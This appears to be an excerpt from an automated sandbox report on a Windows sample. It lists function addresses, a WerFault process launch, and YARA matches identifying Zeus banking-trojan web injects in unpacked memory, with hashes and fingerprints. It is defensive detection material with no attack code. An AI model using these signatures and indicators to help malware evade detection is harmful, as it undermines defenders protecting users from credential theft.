Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0121F2806_2_0121F280
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011E8DA06_2_011E8DA0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0121E4E06_2_0121E4E0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012154F06_2_012154F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01207F606_2_01207F60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011E3FB06_2_011E3FB0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01226FE36_2_01226FE3
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011E8FC06_2_011E8FC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0121AE006_2_0121AE00
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012136F06_2_012136F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0121C6C06_2_0121C6C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012156D06_2_012156D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010479A07_2_010479A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010861E37_2_010861E3
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0107D0E07_2_0107D0E0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010740F07_2_010740F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01066B607_2_01066B60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01042BB07_2_01042BB0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01047BC07_2_01047BC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01079A007_2_01079A00
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0107F2407_2_0107F240
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0107B2C07_2_0107B2C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010742D07_2_010742D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010722F07_2_010722F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0106D5807_2_0106D580
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01078D907_2_01078D90
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01077F407_2_01077F40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01081F607_2_01081F60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105BF807_2_0105BF80
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010737907_2_01073790
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0107D7B07_2_0107D7B0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010476507_2_01047650
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0107BE507_2_0107BE50
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0107A6607_2_0107A660
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0107DE807_2_0107DE80
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0100E9807_2_0100E980
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0101A1907_2_0101A190
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0102099D7_2_0102099D
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010193407_2_01019340
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010233607_2_01023360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01014B907_2_01014B90
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FE8A507_2_00FE8A50
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0101EBB07_2_0101EBB0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0101D2507_2_0101D250
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0101BA607_2_0101BA60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FFD3807_2_00FFD380
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0101F2807_2_0101F280
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FE8DA07_2_00FE8DA0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0101E4E07_2_0101E4E0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010154F07_2_010154F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01007F607_2_01007F60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01026FE37_2_01026FE3
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0101AE007_2_0101AE00
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FE8FC07_2_00FE8FC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FE3FB07_2_00FE3FB0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0101C6C07_2_0101C6C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010156D07_2_010156D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010136F07_2_010136F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A5D0E09_2_00A5D0E0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A540F09_2_00A540F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A279A09_2_00A279A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A661E39_2_00A661E3
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A522F09_2_00A522F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A5B2C09_2_00A5B2C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A542D09_2_00A542D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A59A009_2_00A59A00
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A5F2409_2_00A5F240
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A22BB09_2_00A22BB0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A27BC09_2_00A27BC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A46B609_2_00A46B60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A4D5809_2_00A4D580
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A58D909_2_00A58D90
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A5DE809_2_00A5DE80
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A5A6609_2_00A5A660
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A276509_2_00A27650
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A5BE509_2_00A5BE50
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A5D7B09_2_00A5D7B0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3BF809_2_00A3BF80
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A537909_2_00A53790
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A61F609_2_00A61F60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A57F409_2_00A57F40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009FA1909_2_009FA190
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009EE9809_2_009EE980
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A0099D9_2_00A0099D
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009FF2809_2_009FF280
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009C8A509_2_009C8A50
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009FD2509_2_009FD250
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009FBA609_2_009FBA60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009F4B909_2_009F4B90
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009DD3809_2_009DD380
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009FEBB09_2_009FEBB0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A033609_2_00A03360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009F93409_2_009F9340
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009F54F09_2_009F54F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009FE4E09_2_009FE4E0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009C8DA09_2_009C8DA0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009F56D09_2_009F56D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009FC6C09_2_009FC6C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009F36F09_2_009F36F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009FAE009_2_009FAE00
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009C3FB09_2_009C3FB0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A06FE39_2_00A06FE3
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009C8FC09_2_009C8FC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009E7F609_2_009E7F60
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 904
Source: UMwpXhA46R.exeBinary or memory string: OriginalFilenamejavacpl.exeX vs UMwpXhA46R.exe
Source: UMwpXhA46R.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.fe2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.56.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
